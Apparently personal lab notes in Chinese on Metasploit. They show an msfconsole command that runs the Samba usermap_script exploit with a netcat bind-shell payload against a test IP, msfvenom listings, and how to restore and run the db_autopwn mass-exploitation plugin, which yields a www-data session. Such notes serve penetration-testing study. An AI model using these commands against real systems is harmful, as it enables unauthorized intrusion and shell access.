metasploit学习笔记2

1.阅读老资料的困惑

老资料里一般是根据BT5整理的,kali里的metasploit比较新,不太一样,这里整理一下。

a)msfcli被整合进msfconsole的参数里:

老指令:

#msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat RHOST=192.168.200.129 E

新指令:

#msfconsole -x "use exploit/multi/samba/usermap_script; set RHOST 192.168.200.129; set PAYLOADcmd/unix/bind_netcat; [set LHOST IP;] run"

b)msfpayload、msfencode被整合到msfvenom里:

老指令:

msfpayload -l        #查看所有攻击载荷

msfencode -l         #查看所有编码器

新指令只需一条指令即可:

msfvenom -l payloads,encoders

下图是msfvenom的参数说明:

c)db_autopwn自动渗透脚本被删除

据说是由于该脚本虽然使渗透傻瓜化,但是智能不高,并且造成的负载不小,容易被发现,所以删掉了。

目前替代的方法是可以使用metasploit的一些自动化插件和脚本,但是更好的方法还是自己选择合适的脚本和载荷,使负载变小,效率更高。

https://github.com/rapid7/metasploit-framework/tree/master/plugins

2.db_autopwn傻瓜化测试

虽然db_autopwn被删掉了,但是可以手工恢复。

https://github.com/PsychoSpy/metasploit-framework/blob/autopwn-modules/plugins/db_autopwn.rb

源代码复制下来,保存为db_autopwn.rb文件,复制到/usr/share/metasploit-framwork/plugins/中,然后执行加载

#msf>load db_autopwn

渗透测试:

a)扫描测试机

#msf>db_nmap -v -A 192.168.200.129

--测试机的扫描结果会自动存放如Postgresql数据库中

b)查看扫描结果

c)自动测试

#msf>db_autopwn -t -p -r -e          ----负载不小,1000多个脚本都会跑一遍,需要不少时间,好在成功了一个session。

d)连接会话并测试

会话连接已经成功,但user是www-data(敲错的指令,请自动忽略),不是root,没关系,至少证明db_autopwn还是管用的。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 10,447评论 2 22
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 135,083评论 19 139
  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 2,127评论 0 5
  • 作者:Gilberto Najera-Gutierrez译者:飞龙协议:CC BY-NC-SA 4.0 简介 这章...
    三月行者阅读 1,924评论 2 7
  • 一 漏洞及漏洞发掘方法 漏洞,是指在硬件、软件、协议实现或系统安全策略上存在缺陷,攻击者能够在未授权的情况下对系统...
    kaitoulee阅读 15,379评论 0 30